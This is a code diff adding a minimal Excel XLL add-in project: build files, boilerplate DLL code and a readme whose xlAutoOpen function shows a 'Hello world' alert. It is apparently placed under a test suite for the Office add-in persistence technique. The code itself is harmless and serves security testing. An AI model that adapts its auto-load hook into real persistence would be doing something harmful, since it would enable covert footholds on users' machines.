+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies)</AdditionalDependencies>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="HelloWorldXll.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="HelloWorldXll.def" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters
new file mode 100644
index 00000000..26e577de
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="HelloWorldXll.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="dllmain.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="HelloWorldXll.def">
+      <Filter>Source Files</Filter>
+    </None>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp b/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp
new file mode 100644
index 00000000..69b58914
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp
@@ -0,0 +1,19 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
diff --git a/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp b/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp
new file mode 100644
index 00000000..5708c398
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// HelloWorldXll.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/atomics/T1137.006/src/HelloWorldXll/stdafx.h b/atomics/T1137.006/src/HelloWorldXll/stdafx.h
new file mode 100644
index 00000000..bf593989
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
+// Windows Header Files:
+#include <windows.h>
+
+#include <stdlib.h>
+#include "xlcall.h"
diff --git a/atomics/T1137.006/src/HelloWorldXll/targetver.h b/atomics/T1137.006/src/HelloWorldXll/targetver.h
new file mode 100644
index 00000000..87c0086d
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/atomics/T1137.006/src/readme.md b/atomics/T1137.006/src/readme.md
new file mode 100644
index 00000000..9f82d7ee
--- /dev/null
+++ b/atomics/T1137.006/src/readme.md
@@ -0,0 +1,70 @@
+# Hello World XLL
+
+This is a simple XLL, showing how to create an XLL from scratch.
+
+## Requirements
+
+* A 64-bit version of Excel
+* [Microsoft Visual Studio 2015 Community Edition](https://www.visualstudio.com/en-us/products/visual-studio-community-vs.aspx)
+* [The Excel 2010 SDX](https://www.microsoft.com/en-us/download/details.aspx?id=20199). Instructions assume this is installed at C:\2010 Office System Developer Resources\Excel2010XLLSDK
+
+## Reference
+
+For further details on creating XLLs, dealing with XLOPERs and correct memory handling, I recommend Steve Dalton's excellent [Financial Applications using Excel Add-in Development in C/C++](http://www.amazon.com/Financial-Applications-using-Excel-Development/dp/0470027975)
+
+## Build and Load Instructions
+
+Instructions assume the solution is at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\HelloWorldXll.sln". Adjust the steps below according to the location your cloned this project on your system.
+
+- Load the solution in Visual Studio.
+- Build the solution (Menu: Build... Build Solution)
+- In Excel, open the Add-Ins dialog (this can be done quickly with Alt-T, I)
+- Click "Browse..."
+- Select the XLL at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\x64\Debug\HelloWorldXll.xll". Click OK.
+- If Excel asks "A file name '...' already exists in this location. Do you want to replace it?", click Yes.
+- Click Ok.
+- Excel should display a dialog that says "Hello world". This is from the XLL. Click OK to dismiss the dialog.
+
+## Creation instructions
+
+- Create a new solution (Mone: File... New... Project)
+- In Templates... Other Languages... Visual C++ select Win32. Select Win32 Project. Set Name to "HelloWorldXll". Set Solution name to "HelloWorldXll". Ensure "Create directory for solution" is checked. Click OK. Note: These instructions assume the Location is set to "C:\Users\Jameson\Documents\Visual Studio 2015\Projects". Adjust the steps below according to the location you use.
+- Click Next at the Overview page.
+- Select Application type "DLL". Clear the checkboxes for Precompiled header and Security Development Lifecycle. Click Finish.
+- In the Solution Explorer, right click the HelloWorldXll and select Properties.
+- Select Configuration "All Configurations" and Platform "x64".
+- In Configuration Properties...General, Set Target Extension to ".xll".
+- In Configuration Properties...C/C++...General, select "Additional Include Directories", click the dropdown arrow on the right, select "Edit...". In the Additional Include Directories dialog, click the New Line icon (it looks like a folder with a red star, in the top-right corner of the window). This will create a new line in the top input box (the ungreyed one). Click the "..." button on the right of that line, which will open a Select Directory dialog. Navigate to "C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE" and click "Select Folder". Click OK to set the Additional Include Directories.
+- In Configuration Proporties...Linker..Input, edit the "Additional Dependencies" as with the previous step. In the top edit box (the ungreyed one), add the text "C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB". Click OK to set the Additional Dependencies.
+- In stdafx.h, add the following lines at the end of the file:
+```c
+#include <stdlib.h>
+#include "xlcall.h"
+```
+- In HelloWorldXll.cpp add the following lines at the end of the file:
+```c
+short __stdcall xlAutoOpen()
+{
+	char *text= "Hello world";
+	size_t text_len = strlen(text);
+	XLOPER message;
+	message.xltype = xltypeStr;
+	message.val.str = (char *)malloc(text_len + 2);
+	memcpy(message.val.str + 1, text, text_len + 1);
+	message.val.str[0] = (char)text_len;
+	XLOPER dialog_type;
+	dialog_type.xltype = xltypeInt;
+	dialog_type.val.w = 2;
+	Excel4(xlcAlert, NULL, 2, &message, &dialog_type);
+	return 1;
+}
+```
+- In the Solution Explorer, right click the HelloWorldXll and select Add..New Item.
+- In the Add New Item dialog, in the tree on the left, select Visual C++... Code. Then select Module-Definition File (.def). Set Name to "HelloWorldXll.def". Click Add.
+- Change the contents of HelloWorldXll.def to:
+```
+EXPORTS
+	xlAutoOpen
+```
+
+The solution is now ready to build and load using the instructions above.